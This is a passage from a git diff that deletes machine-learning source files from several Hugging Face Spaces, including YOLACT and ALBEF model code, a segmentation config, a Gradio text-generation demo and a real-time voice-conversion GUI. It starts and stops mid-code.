bbox_head, - segm_head, - mask_head, - train_cfg=None, - test_cfg=None, - pretrained=None): - super(YOLACT, self).__init__(backbone, neck, bbox_head, train_cfg, - test_cfg, pretrained) - self.segm_head = build_head(segm_head) - self.mask_head = build_head(mask_head) - self.init_segm_mask_weights() - - def init_segm_mask_weights(self): - """Initialize weights of the YOLACT segm head and YOLACT mask head.""" - self.segm_head.init_weights() - self.mask_head.init_weights() - - def forward_dummy(self, img): - """Used for computing network flops. - - See `mmdetection/tools/analysis_tools/get_flops.py` - """ - raise NotImplementedError - - def forward_train(self, - img, - img_metas, - gt_bboxes, - gt_labels, - gt_bboxes_ignore=None, - gt_masks=None): - """ - Args: - img (Tensor): of shape (N, C, H, W) encoding input images. - Typically these should be mean centered and std scaled. - img_metas (list[dict]): list of image info dict where each dict - has: 'img_shape', 'scale_factor', 'flip', and may also contain - 'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'. - For details on the values of these keys see - `mmdet/datasets/pipelines/formatting.py:Collect`. - gt_bboxes (list[Tensor]): Ground truth bboxes for each image with - shape (num_gts, 4) in [tl_x, tl_y, br_x, br_y] format. - gt_labels (list[Tensor]): class indices corresponding to each box - gt_bboxes_ignore (None | list[Tensor]): specify which bounding - boxes can be ignored when computing the loss. - gt_masks (None | Tensor) : true segmentation masks for each box - used if the architecture supports a segmentation task. 
- - Returns: - dict[str, Tensor]: a dictionary of loss components - """ - # convert Bitmap mask or Polygon Mask to Tensor here - gt_masks = [ - gt_mask.to_tensor(dtype=torch.uint8, device=img.device) - for gt_mask in gt_masks - ] - - x = self.extract_feat(img) - - cls_score, bbox_pred, coeff_pred = self.bbox_head(x) - bbox_head_loss_inputs = (cls_score, bbox_pred) + (gt_bboxes, gt_labels, - img_metas) - losses, sampling_results = self.bbox_head.loss( - *bbox_head_loss_inputs, gt_bboxes_ignore=gt_bboxes_ignore) - - segm_head_outs = self.segm_head(x[0]) - loss_segm = self.segm_head.loss(segm_head_outs, gt_masks, gt_labels) - losses.update(loss_segm) - - mask_pred = self.mask_head(x[0], coeff_pred, gt_bboxes, img_metas, - sampling_results) - loss_mask = self.mask_head.loss(mask_pred, gt_masks, gt_bboxes, - img_metas, sampling_results) - losses.update(loss_mask) - - # check NaN and Inf - for loss_name in losses.keys(): - assert torch.isfinite(torch.stack(losses[loss_name]))\ - .all().item(), '{} becomes infinite or NaN!'\ - .format(loss_name) - - return losses - - def simple_test(self, img, img_metas, rescale=False): - """Test function without test time augmentation.""" - x = self.extract_feat(img) - - cls_score, bbox_pred, coeff_pred = self.bbox_head(x) - - bbox_inputs = (cls_score, bbox_pred, - coeff_pred) + (img_metas, self.test_cfg, rescale) - det_bboxes, det_labels, det_coeffs = self.bbox_head.get_bboxes( - *bbox_inputs) - bbox_results = [ - bbox2result(det_bbox, det_label, self.bbox_head.num_classes) - for det_bbox, det_label in zip(det_bboxes, det_labels) - ] - - num_imgs = len(img_metas) - scale_factors = tuple(meta['scale_factor'] for meta in img_metas) - if all(det_bbox.shape[0] == 0 for det_bbox in det_bboxes): - segm_results = [[[] for _ in range(self.mask_head.num_classes)] - for _ in range(num_imgs)] - else: - # if det_bboxes is rescaled to the original image size, we need to - # rescale it back to the testing scale to obtain RoIs. 
- if rescale and not isinstance(scale_factors[0], float): - scale_factors = [ - torch.from_numpy(scale_factor).to(det_bboxes[0].device) - for scale_factor in scale_factors - ] - _bboxes = [ - det_bboxes[i][:, :4] * - scale_factors[i] if rescale else det_bboxes[i][:, :4] - for i in range(len(det_bboxes)) - ] - mask_preds = self.mask_head(x[0], det_coeffs, _bboxes, img_metas) - # apply mask post-processing to each image individually - segm_results = [] - for i in range(num_imgs): - if det_bboxes[i].shape[0] == 0: - segm_results.append( - [[] for _ in range(self.mask_head.num_classes)]) - else: - segm_result = self.mask_head.get_seg_masks( - mask_preds[i], det_labels[i], img_metas[i], rescale) - segm_results.append(segm_result) - return list(zip(bbox_results, segm_results)) - - def aug_test(self, imgs, img_metas, rescale=False): - """Test with augmentations.""" - raise NotImplementedError diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/configs/_base_/models/dnl_r50-d8.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/configs/_base_/models/dnl_r50-d8.py deleted file mode 100644 index edb4c174c51e34c103737ba39bfc48bf831e561d..0000000000000000000000000000000000000000 --- a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/configs/_base_/models/dnl_r50-d8.py +++ /dev/null @@ -1,46 +0,0 @@ -# model settings -norm_cfg = dict(type='SyncBN', requires_grad=True) -model = dict( - type='EncoderDecoder', - pretrained='open-mmlab://resnet50_v1c', - backbone=dict( - type='ResNetV1c', - depth=50, - num_stages=4, - out_indices=(0, 1, 2, 3), - dilations=(1, 1, 2, 4), - strides=(1, 2, 1, 1), - norm_cfg=norm_cfg, - norm_eval=False, - style='pytorch', - contract_dilation=True), - decode_head=dict( - type='DNLHead', - in_channels=2048, - in_index=3, - channels=512, - dropout_ratio=0.1, - reduction=2, - use_scale=True, - mode='embedded_gaussian', - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - 
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)), - auxiliary_head=dict( - type='FCNHead', - in_channels=1024, - in_index=2, - channels=256, - num_convs=1, - concat_input=False, - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)), - # model training and testing settings - train_cfg=dict(), - test_cfg=dict(mode='whole')) diff --git a/spaces/Rongjiehuang/GenerSpeech/modules/parallel_wavegan/optimizers/__init__.py b/spaces/Rongjiehuang/GenerSpeech/modules/parallel_wavegan/optimizers/__init__.py deleted file mode 100644 index a0e0c5932838281e912079e5784d84d43444a61a..0000000000000000000000000000000000000000 --- a/spaces/Rongjiehuang/GenerSpeech/modules/parallel_wavegan/optimizers/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -from torch.optim import * # NOQA -from .radam import * # NOQA diff --git a/spaces/SeViLA/SeViLA/lavis/models/albef_models/albef_pretrain.py b/spaces/SeViLA/SeViLA/lavis/models/albef_models/albef_pretrain.py deleted file mode 100644 index e25baf30a65f3218bb7b9ab8ebed6b01f74c773b..0000000000000000000000000000000000000000 --- a/spaces/SeViLA/SeViLA/lavis/models/albef_models/albef_pretrain.py +++ /dev/null @@ -1,416 +0,0 @@ -""" - Copyright (c) 2022, salesforce.com, inc. - All rights reserved. 
- SPDX-License-Identifier: BSD-3-Clause - For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause -""" - -from copy import deepcopy - -import numpy as np -import torch -import torch.nn.functional as F -from lavis.common.registry import registry -from lavis.common.utils import get_abs_path -from lavis.models.albef_models import AlbefBase -from lavis.models.albef_models.albef_outputs import ( - AlbefIntermediateOutput, - AlbefOutput, - AlbefSimilarity, -) -from lavis.models.base_model import MomentumDistilationMixin, SharedQueueMixin -from lavis.models.med import BertForMaskedLM -from lavis.models.vit import VisionTransformerEncoder -from torch import nn -from transformers import BertConfig - - -@registry.register_model("albef_pretrain") -class AlbefPretrain(AlbefBase, MomentumDistilationMixin, SharedQueueMixin): - """ - ALBEF pretrain model. - - Supported model types: - - base: ALBEF base model used for pretraining. - """ - - PRETRAINED_MODEL_CONFIG_DICT = { - "base": "configs/models/albef_pretrain_base.yaml", - } - - def __init__( - self, - image_encoder, - text_encoder, - queue_size, - embed_dim=256, - mlm_mask_prob=0.15, - temp=0.07, - momentum=0.995, - alpha=0.4, - max_txt_len=30, - ): - super().__init__() - - self.tokenizer = self.init_tokenizer() - - self.visual_encoder = image_encoder - self.text_encoder = text_encoder - - text_width = text_encoder.config.hidden_size - vision_width = image_encoder.vision_width - - self.embed_dim = embed_dim - - self.vision_proj = nn.Linear(vision_width, embed_dim) - self.text_proj = nn.Linear(text_width, embed_dim) - - self.itm_head = nn.Linear(text_width, 2) - - # create the momentum encoder - self.visual_encoder_m = deepcopy(self.visual_encoder) - self.text_encoder_m = deepcopy(self.text_encoder) - - self.vision_proj_m = deepcopy(self.vision_proj) - self.text_proj_m = deepcopy(self.text_proj) - - self.model_pairs = [ - [self.visual_encoder, self.visual_encoder_m], - 
[self.text_encoder, self.text_encoder_m], - [self.vision_proj, self.vision_proj_m], - [self.text_proj, self.text_proj_m], - ] - self.copy_params() - - # create the queue - self.register_buffer("image_queue", torch.randn(embed_dim, queue_size)) - self.register_buffer("text_queue", torch.randn(embed_dim, queue_size)) - self.register_buffer("queue_ptr", torch.zeros(1, dtype=torch.long)) - - self.image_queue = nn.functional.normalize(self.image_queue, dim=0) - self.text_queue = nn.functional.normalize(self.text_queue, dim=0) - - self.queue_size = queue_size - self.momentum = momentum - self.temp = nn.Parameter(temp * torch.ones([])) - - self.alpha = alpha - self.max_txt_len = max_txt_len - - self.mlm_probability = mlm_mask_prob - - def _rampup_factor(self, epoch, iters, num_iters_per_epoch): - return min(1, (epoch * num_iters_per_epoch + iters) / (2 * num_iters_per_epoch)) - - def forward(self, samples): - """ - Args: - samples (dict): A dictionary containing the following keys: - - image (torch.Tensor): A tensor of shape (batch_size, 3, H, W). The input images. Default: H=224, W=224. - - text_input (list): A list of length batch_size, each element is a string of text/caption. - - epoch (int): The current epoch. - - iters (int): The current iteration. - - num_iters_per_epoch (int): The number of iterations per epoch. - - Returns: - BlipOutput: A BlipOutput object containing loss and intermediate output. See ``lavis.models.blip_models.blip_outputs.BlipOutput`` for more details. 
- - Examples: - >>> import torch - >>> from lavis.models import load_model - >>> model = load_model("albef_pretrain") - >>> images = torch.randn(4, 3, 224, 224) - >>> text_input = ["caption of image 1", "another caption of image 1", "caption of image 2", "caption of image 3"] - >>> samples = {"image": images, "text_input": text_input, "epoch": 0, "iters": 0, "num_iters_per_epoch": 100} - >>> output = model(samples) - >>> output.keys() - odict_keys(['sims', 'intermediate_output', 'loss', 'loss_itc', 'loss_itm', 'loss_mlm']) - """ - image = samples["image"] - caption = samples["text_input"] - - alpha = self.alpha * self._rampup_factor( - epoch=samples["epoch"], - iters=samples["iters"], - num_iters_per_epoch=samples["num_iters_per_epoch"], - ) - - with torch.no_grad(): - self.temp.clamp_(0.001, 0.5) - - image_embeds = self.visual_encoder.forward_features(image) - image_atts = torch.ones(image_embeds.size()[:-1], dtype=torch.long).to( - self.device - ) - - text = self.tokenizer( - caption, - padding="max_length", - truncation=True, - max_length=self.max_txt_len, - return_tensors="pt", - ).to(self.device) - - image_feat = F.normalize(self.vision_proj(image_embeds[:, 0, :]), dim=-1) - - text_output = self.text_encoder.bert( - text.input_ids, - attention_mask=text.attention_mask, - return_dict=True, - mode="text", - ) - text_embeds = text_output.last_hidden_state - text_feat = F.normalize(self.text_proj(text_embeds[:, 0, :]), dim=-1) - - # get momentum features - with torch.no_grad(): - self._momentum_update() - image_embeds_m = self.visual_encoder_m(image) - image_feat_m = F.normalize( - self.vision_proj_m(image_embeds_m[:, 0, :]), dim=-1 - ) - image_feat_all = torch.cat( - [image_feat_m.t(), self.image_queue.clone().detach()], dim=1 - ) - text_output_m = self.text_encoder_m.bert( - text.input_ids, - attention_mask=text.attention_mask, - return_dict=True, - mode="text", - ) - text_embeds_m = text_output_m.last_hidden_state - text_feat_m = 
F.normalize(self.text_proj_m(text_embeds_m[:, 0, :]), dim=-1) - text_feat_all = torch.cat( - [text_feat_m.t(), self.text_queue.clone().detach()], dim=1 - ) - - sim_i2t_m = image_feat_m @ text_feat_all / self.temp - sim_t2i_m = text_feat_m @ image_feat_all / self.temp - - sim_targets = torch.zeros(sim_i2t_m.size()).to(image.device) - sim_targets.fill_diagonal_(1) - - sim_i2t_targets = ( - alpha * F.softmax(sim_i2t_m, dim=1) + (1 - alpha) * sim_targets - ) - sim_t2i_targets = ( - alpha * F.softmax(sim_t2i_m, dim=1) + (1 - alpha) * sim_targets - ) - - sim_i2t = image_feat @ text_feat_all / self.temp - sim_t2i = text_feat @ image_feat_all / self.temp - - loss_i2t = -torch.sum( - F.log_softmax(sim_i2t, dim=1) * sim_i2t_targets, dim=1 - ).mean() - loss_t2i = -torch.sum( - F.log_softmax(sim_t2i, dim=1) * sim_t2i_targets, dim=1 - ).mean() - - loss_itc = (loss_i2t + loss_t2i) / 2 - - self._dequeue_and_enqueue(image_feat_m, text_feat_m) - - # forward the positive image-text pair - encoder_output_pos = self.text_encoder.bert( - encoder_embeds=text_embeds, - attention_mask=text.attention_mask, - encoder_hidden_states=image_embeds, - encoder_attention_mask=image_atts, - return_dict=True, - mode="fusion", - ) - with torch.no_grad(): - bs = image.size(0) - - weights_i2t = sim_i2t[:, :bs].clone() - weights_t2i = sim_t2i[:, :bs].clone() - - weights_i2t.fill_diagonal_(-np.Inf) - weights_t2i.fill_diagonal_(-np.Inf) - - weights_i2t = F.softmax(weights_i2t, dim=1) - weights_t2i = F.softmax(weights_t2i, dim=1) - - # select a negative image for each text - image_embeds_neg = [] - for b in range(bs): - neg_idx = torch.multinomial(weights_t2i[b], 1).item() - image_embeds_neg.append(image_embeds[neg_idx]) - image_embeds_neg = torch.stack(image_embeds_neg, dim=0) - - # select a negative text for each image - text_embeds_neg = [] - text_atts_neg = [] - for b in range(bs): - neg_idx = torch.multinomial(weights_i2t[b], 1).item() - text_embeds_neg.append(text_embeds[neg_idx]) - 
text_atts_neg.append(text.attention_mask[neg_idx]) - text_embeds_neg = torch.stack(text_embeds_neg, dim=0) - text_atts_neg = torch.stack(text_atts_neg, dim=0) - - text_embeds_all = torch.cat([text_embeds, text_embeds_neg], dim=0) - text_atts_all = torch.cat([text.attention_mask, text_atts_neg], dim=0) - - image_embeds_all = torch.cat([image_embeds_neg, image_embeds], dim=0) - image_atts_all = torch.cat([image_atts, image_atts], dim=0) - - encoder_output_neg = self.text_encoder.bert( - encoder_embeds=text_embeds_all, - attention_mask=text_atts_all, - encoder_hidden_states=image_embeds_all, - encoder_attention_mask=image_atts_all, - return_dict=True, - mode="fusion", - ) - - vl_embeddings = torch.cat( - [ - encoder_output_pos.last_hidden_state[:, 0, :], - encoder_output_neg.last_hidden_state[:, 0, :], - ], - dim=0, - ) - itm_logits = self.itm_head(vl_embeddings) - - itm_labels = torch.cat( - [torch.ones(bs, dtype=torch.long), torch.zeros(2 * bs, dtype=torch.long)], - dim=0, - ).to(self.device) - loss_itm = F.cross_entropy(itm_logits, itm_labels) - - # MLM - input_ids = text.input_ids.clone() - labels = input_ids.clone() - - probability_matrix = torch.full(labels.shape, self.mlm_probability) - input_ids, labels = self.mask( - input_ids, - self.text_encoder.config.vocab_size, - self.device, - targets=labels, - probability_matrix=probability_matrix, - ) - - with torch.no_grad(): - logits_m = self.text_encoder_m( - input_ids, - attention_mask=text.attention_mask, - encoder_hidden_states=image_embeds_m, - encoder_attention_mask=image_atts, - return_dict=True, - return_logits=True, - ) - mlm_output = self.text_encoder( - input_ids, - attention_mask=text.attention_mask, - encoder_hidden_states=image_embeds, - encoder_attention_mask=image_atts, - return_dict=True, - labels=labels, - soft_labels=F.softmax(logits_m, dim=-1), - alpha=alpha, - ) - loss_mlm = mlm_output.loss - - return AlbefOutput( - loss=loss_itc + loss_itm + loss_mlm, - loss_itc=loss_itc, - loss_itm=loss_itm, - 
loss_mlm=loss_mlm, - sims=AlbefSimilarity( - sim_i2t=sim_i2t, - sim_t2i=sim_t2i, - sim_i2t_m=sim_i2t_m, - sim_t2i_m=sim_t2i_m, - sim_i2t_targets=sim_i2t_targets, - sim_t2i_targets=sim_t2i_targets, - ), - intermediate_output=AlbefIntermediateOutput( - image_embeds=image_embeds, - image_embeds_m=image_embeds_m, - text_embeds=text_embeds, - text_embeds_m=text_embeds_m, - encoder_output=encoder_output_pos, - encoder_output_neg=encoder_output_neg, - itm_logits=itm_logits, - itm_labels=itm_labels, - ), - ) - - def mask( - self, - input_ids, - vocab_size, - device, - targets=None, - masked_indices=None, - probability_matrix=None, - ): - """ - Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. - """ - if masked_indices is None: - masked_indices = torch.bernoulli(probability_matrix).bool() - - masked_indices[input_ids == self.tokenizer.pad_token_id] = False - masked_indices[input_ids == self.tokenizer.cls_token_id] = False - - if targets is not None: - targets[~masked_indices] = -100 # We only compute loss on masked tokens - - # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) - indices_replaced = ( - torch.bernoulli(torch.full(input_ids.shape, 0.8)).bool() & masked_indices - ) - input_ids[indices_replaced] = self.tokenizer.mask_token_id - - # 10% of the time, we replace masked input tokens with random word - indices_random = ( - torch.bernoulli(torch.full(input_ids.shape, 0.5)).bool() - & masked_indices - & ~indices_replaced - ) - random_words = torch.randint(vocab_size, input_ids.shape, dtype=torch.long).to( - device - ) - input_ids[indices_random] = random_words[indices_random] - # The rest of the time (10% of the time) we keep the masked input tokens unchanged - - if targets is not None: - return input_ids, targets - else: - return input_ids - - @classmethod - def from_config(cls, cfg=None): - image_encoder = VisionTransformerEncoder.from_config(cfg, from_pretrained=True) - 
config_text_encoder = BertConfig.from_json_file( - get_abs_path(cfg["med_config_path"]) - ) - config_text_encoder.fusion_layer = 6 - text_encoder = BertForMaskedLM.from_pretrained( - "bert-base-uncased", config=config_text_encoder - ) - - embed_dim = cfg.get("embed_dim", 256) - momentum = cfg.get("momentum", 0.995) - alpha = cfg.get("alpha", 0.4) - mlm_mask_prob = cfg.get("mlm_mask_prob", 0.15) - temp = cfg.get("temp", 0.07) - max_txt_len = cfg.get("max_txt_len", 30) - queue_size = cfg.get("queue_size", 65536) - - model = cls( - image_encoder=image_encoder, - text_encoder=text_encoder, - queue_size=queue_size, - embed_dim=embed_dim, - mlm_mask_prob=mlm_mask_prob, - temp=temp, - momentum=momentum, - alpha=alpha, - max_txt_len=max_txt_len, - ) - - return model diff --git a/spaces/SebastianSchramm/Cerebras-GPT-111M-instruction-playground/app.py b/spaces/SebastianSchramm/Cerebras-GPT-111M-instruction-playground/app.py deleted file mode 100644 index fb3e5d9f5afcab04c954568afb535fa92a855076..0000000000000000000000000000000000000000 --- a/spaces/SebastianSchramm/Cerebras-GPT-111M-instruction-playground/app.py +++ /dev/null @@ -1,155 +0,0 @@ -import os -import gradio as gr -from transformers import AutoModelForCausalLM, AutoTokenizer, GenerationConfig, TextIteratorStreamer -import torch -from threading import Thread -from huggingface_hub import Repository -import json - -theme = gr.themes.Monochrome( - primary_hue="indigo", - secondary_hue="blue", - neutral_hue="slate", - radius_size=gr.themes.sizes.radius_sm, - font=[gr.themes.GoogleFont("Open Sans"), "ui-sans-serif", "system-ui", "sans-serif"], -) -os.environ["TOKENIZERS_PARALLELISM"] = "false" - -# Load peft config for pre-trained checkpoint etc. 
-device = "cuda" if torch.cuda.is_available() else "cpu" -model_id = "SebastianSchramm/Cerebras-GPT-111M-instruction" -if device == "cpu": - model = AutoModelForCausalLM.from_pretrained(model_id) -else: - model = AutoModelForCausalLM.from_pretrained(model_id, device_map="auto") -tokenizer = AutoTokenizer.from_pretrained(model_id) - -prompt_template = "Below is an instruction that describes a task, paired with an input that provides further context.\n" \ - "Write a response that appropriately completes the request.\n\n" \ - "### Instruction:\n{instruction}\n\n### Input:\n{input}\n\n### Response:" - - -def generate(instruction, input='', temperature=1.0, max_new_tokens=256, top_p=0.9, length_penalty=1.0): - formatted_instruction = prompt_template.format(instruction=instruction, input=input) - - # make sure temperature top_p and length_penalty are floats - temperature = float(temperature) - top_p = float(top_p) - length_penalty = float(length_penalty) - - # STREAMING BASED ON git+https://github.com/gante/transformers.git@streamer_iterator - - # streaming - streamer = TextIteratorStreamer(tokenizer) - model_inputs = tokenizer(formatted_instruction, return_tensors="pt", truncation=True, max_length=2048) - # move to gpu - model_inputs = {k: v.to(device) for k, v in model_inputs.items()} - - generate_kwargs = dict( - top_p=top_p, - top_k=0, - temperature=temperature, - do_sample=True, - max_new_tokens=max_new_tokens, - early_stopping=True, - length_penalty=length_penalty, - eos_token_id=tokenizer.eos_token_id, - pad_token_id=tokenizer.eos_token_id, - ) - t = Thread(target=model.generate, kwargs={**dict(model_inputs, streamer=streamer), **generate_kwargs}) - t.start() - - output = "" - hidden_output = "" - for new_text in streamer: - # skip streaming until new text is available - if len(hidden_output) <= len(formatted_instruction): - hidden_output += new_text - continue - # replace eos token - if tokenizer.eos_token in new_text: - new_text = 
new_text.replace(tokenizer.eos_token, "") - output += new_text - yield output - return output - -examples = [] - -def process_example(args): - for x in generate(args): - pass - return x - -with gr.Blocks(theme=theme) as demo: - with gr.Column(): - gr.Markdown( - """

    # Instruction-tuned Cerebras GPT 111M Language Model for Text

    - Link to model: [Cerebras-GPT-111M-instruction](SebastianSchramm/Cerebras-GPT-111M-instruction)

- """ - ) - with gr.Row(): - with gr.Column(scale=3): - instruction = gr.Textbox(placeholder="Instruction...", label="Instruction") - input = gr.Textbox(placeholder="Input...", label="Input") - output = gr.Textbox( - interactive=False, - lines=8, - label="Response", - placeholder="Response will be shown here...", - ) - submit = gr.Button("Generate", variant="primary") - gr.Examples( - examples=examples, - inputs=[instruction, input], - cache_examples=True, - fn=process_example, - outputs=[output], - ) - - with gr.Column(scale=1): - temperature = gr.Slider( - label="Temperature", - value=1.0, - minimum=0.01, - maximum=1.0, - step=0.1, - interactive=True, - info="Higher values produce more random output", - ) - max_new_tokens = gr.Slider( - label="Max new tokens", - value=256, - minimum=0, - maximum=2048, - step=5, - interactive=True, - info="The maximum number of new tokens", - ) - top_p = gr.Slider( - label="Top p", - value=0.9, - minimum=0.01, - maximum=1, - step=0.05, - interactive=True, - info="Keeps the smallest token set whose probabilities add up to top_p", - ) - length_penalty = gr.Slider( - label="Length penalty", - value=1.0, - minimum=-10.0, - maximum=10.0, - step=0.1, - interactive=True, - info="> 0.0 longer, < 0.0 shorter", - ) - - submit.click(generate, inputs=[instruction, input, temperature, max_new_tokens, top_p, length_penalty], outputs=[output]) - instruction.submit( - generate, inputs=[instruction, input, temperature, max_new_tokens, top_p, length_penalty], outputs=[output] - ) - -demo.queue(concurrency_count=1) -demo.launch(enable_queue=True) diff --git a/spaces/ServerX/PorcoDiaz/gui_v0.py b/spaces/ServerX/PorcoDiaz/gui_v0.py deleted file mode 100644 index 88c3cf9eb1eaa0fa812b32ae4d3750b4ce0a8699..0000000000000000000000000000000000000000 --- a/spaces/ServerX/PorcoDiaz/gui_v0.py +++ /dev/null @@ -1,786 +0,0 @@ -import os, sys, traceback, re - -import json - -now_dir = os.getcwd() -sys.path.append(now_dir) -from configs.config import Config - -Config = Config() -import PySimpleGUI as sg 
-import sounddevice as sd -import noisereduce as nr -import numpy as np -from fairseq import checkpoint_utils -import librosa, torch, pyworld, faiss, time, threading -import torch.nn.functional as F -import torchaudio.transforms as tat -import scipy.signal as signal -import torchcrepe - -# import matplotlib.pyplot as plt -from lib.infer_pack.models import ( - SynthesizerTrnMs256NSFsid, - SynthesizerTrnMs256NSFsid_nono, - SynthesizerTrnMs768NSFsid, - SynthesizerTrnMs768NSFsid_nono, -) -from i18n import I18nAuto - -i18n = I18nAuto() -device = torch.device("cuda" if torch.cuda.is_available() else "cpu") -current_dir = os.getcwd() - - -class RVC: - def __init__( - self, key, f0_method, hubert_path, pth_path, index_path, npy_path, index_rate - ) -> None: - """ - Initialize the model and its feature index. - """ - try: - self.f0_up_key = key - self.time_step = 160 / 16000 * 1000 - self.f0_min = 50 - self.f0_max = 1100 - self.f0_mel_min = 1127 * np.log(1 + self.f0_min / 700) - self.f0_mel_max = 1127 * np.log(1 + self.f0_max / 700) - self.f0_method = f0_method - self.sr = 16000 - self.window = 160 - - # Get Torch Device - if torch.cuda.is_available(): - self.torch_device = torch.device( - f"cuda:{0 % torch.cuda.device_count()}" - ) - elif torch.backends.mps.is_available(): - self.torch_device = torch.device("mps") - else: - self.torch_device = torch.device("cpu") - - if index_rate != 0: - self.index = faiss.read_index(index_path) - # self.big_npy = np.load(npy_path) - self.big_npy = self.index.reconstruct_n(0, self.index.ntotal) - print("index search enabled") - self.index_rate = index_rate - model_path = hubert_path - print("load model(s) from {}".format(model_path)) - models, saved_cfg, task = checkpoint_utils.load_model_ensemble_and_task( - [model_path], - suffix="", - ) - self.model = models[0] - self.model = self.model.to(device) - if Config.is_half: - self.model = self.model.half() - else: - self.model = self.model.float() - self.model.eval() - cpt = torch.load(pth_path, map_location="cpu") - self.tgt_sr = 
cpt["config"][-1] - cpt["config"][-3] = cpt["weight"]["emb_g.weight"].shape[0] # n_spk - self.if_f0 = cpt.get("f0", 1) - self.version = cpt.get("version", "v1") - if self.version == "v1": - if self.if_f0 == 1: - self.net_g = SynthesizerTrnMs256NSFsid( - *cpt["config"], is_half=Config.is_half - ) - else: - self.net_g = SynthesizerTrnMs256NSFsid_nono(*cpt["config"]) - elif self.version == "v2": - if self.if_f0 == 1: - self.net_g = SynthesizerTrnMs768NSFsid( - *cpt["config"], is_half=Config.is_half - ) - else: - self.net_g = SynthesizerTrnMs768NSFsid_nono(*cpt["config"]) - del self.net_g.enc_q - print(self.net_g.load_state_dict(cpt["weight"], strict=False)) - self.net_g.eval().to(device) - if Config.is_half: - self.net_g = self.net_g.half() - else: - self.net_g = self.net_g.float() - except: - print(traceback.format_exc()) - - def get_regular_crepe_computation(self, x, f0_min, f0_max, model="full"): - batch_size = 512 - # Compute pitch using first gpu - audio = torch.tensor(np.copy(x))[None].float() - f0, pd = torchcrepe.predict( - audio, - self.sr, - self.window, - f0_min, - f0_max, - model, - batch_size=batch_size, - device=self.torch_device, - return_periodicity=True, - ) - pd = torchcrepe.filter.median(pd, 3) - f0 = torchcrepe.filter.mean(f0, 3) - f0[pd < 0.1] = 0 - f0 = f0[0].cpu().numpy() - return f0 - - def get_harvest_computation(self, x, f0_min, f0_max): - f0, t = pyworld.harvest( - x.astype(np.double), - fs=self.sr, - f0_ceil=f0_max, - f0_floor=f0_min, - frame_period=10, - ) - f0 = pyworld.stonemask(x.astype(np.double), f0, t, self.sr) - f0 = signal.medfilt(f0, 3) - return f0 - - def get_f0(self, x, f0_up_key, inp_f0=None): - # Calculate Padding and f0 details here - p_len = x.shape[0] // 512 # For Now This probs doesn't work - x_pad = 1 - f0_min = 50 - f0_max = 1100 - f0_mel_min = 1127 * np.log(1 + f0_min / 700) - f0_mel_max = 1127 * np.log(1 + f0_max / 700) - - f0 = 0 - # Here, check f0_methods and get their computations - if self.f0_method == "harvest": - 
f0 = self.get_harvest_computation(x, f0_min, f0_max) - elif self.f0_method == "reg-crepe": - f0 = self.get_regular_crepe_computation(x, f0_min, f0_max) - elif self.f0_method == "reg-crepe-tiny": - f0 = self.get_regular_crepe_computation(x, f0_min, f0_max, "tiny") - - # Calculate f0_course and f0_bak here - f0 *= pow(2, f0_up_key / 12) - # with open("test.txt","w")as f:f.write("\n".join([str(i)for i in f0.tolist()])) - tf0 = self.sr // self.window # 每秒f0点数 - if inp_f0 is not None: - delta_t = np.round( - (inp_f0[:, 0].max() - inp_f0[:, 0].min()) * tf0 + 1 - ).astype("int16") - replace_f0 = np.interp( - list(range(delta_t)), inp_f0[:, 0] * 100, inp_f0[:, 1] - ) - shape = f0[x_pad * tf0 : x_pad * tf0 + len(replace_f0)].shape[0] - f0[x_pad * tf0 : x_pad * tf0 + len(replace_f0)] = replace_f0[:shape] - # with open("test_opt.txt","w")as f:f.write("\n".join([str(i)for i in f0.tolist()])) - f0bak = f0.copy() - f0_mel = 1127 * np.log(1 + f0 / 700) - f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - f0_mel_min) * 254 / ( - f0_mel_max - f0_mel_min - ) + 1 - f0_mel[f0_mel <= 1] = 1 - f0_mel[f0_mel > 255] = 255 - f0_coarse = np.rint(f0_mel).astype(np.int) - return f0_coarse, f0bak # 1-0 - - def infer(self, feats: torch.Tensor) -> np.ndarray: - """ - 推理函数 - """ - audio = feats.clone().cpu().numpy() - assert feats.dim() == 1, feats.dim() - feats = feats.view(1, -1) - padding_mask = torch.BoolTensor(feats.shape).fill_(False) - if Config.is_half: - feats = feats.half() - else: - feats = feats.float() - inputs = { - "source": feats.to(device), - "padding_mask": padding_mask.to(device), - "output_layer": 9 if self.version == "v1" else 12, - } - torch.cuda.synchronize() - with torch.no_grad(): - logits = self.model.extract_features(**inputs) - feats = ( - self.model.final_proj(logits[0]) if self.version == "v1" else logits[0] - ) - - ####索引优化 - try: - if ( - hasattr(self, "index") - and hasattr(self, "big_npy") - and self.index_rate != 0 - ): - npy = feats[0].cpu().numpy().astype("float32") - 
score, ix = self.index.search(npy, k=8) - weight = np.square(1 / score) - weight /= weight.sum(axis=1, keepdims=True) - npy = np.sum(self.big_npy[ix] * np.expand_dims(weight, axis=2), axis=1) - if Config.is_half: - npy = npy.astype("float16") - feats = ( - torch.from_numpy(npy).unsqueeze(0).to(device) * self.index_rate - + (1 - self.index_rate) * feats - ) - else: - print("index search FAIL or disabled") - except: - traceback.print_exc() - print("index search FAIL") - feats = F.interpolate(feats.permute(0, 2, 1), scale_factor=2).permute(0, 2, 1) - torch.cuda.synchronize() - print(feats.shape) - if self.if_f0 == 1: - pitch, pitchf = self.get_f0(audio, self.f0_up_key) - p_len = min(feats.shape[1], 13000, pitch.shape[0]) # 太大了爆显存 - else: - pitch, pitchf = None, None - p_len = min(feats.shape[1], 13000) # 太大了爆显存 - torch.cuda.synchronize() - # print(feats.shape,pitch.shape) - feats = feats[:, :p_len, :] - if self.if_f0 == 1: - pitch = pitch[:p_len] - pitchf = pitchf[:p_len] - pitch = torch.LongTensor(pitch).unsqueeze(0).to(device) - pitchf = torch.FloatTensor(pitchf).unsqueeze(0).to(device) - p_len = torch.LongTensor([p_len]).to(device) - ii = 0 # sid - sid = torch.LongTensor([ii]).to(device) - with torch.no_grad(): - if 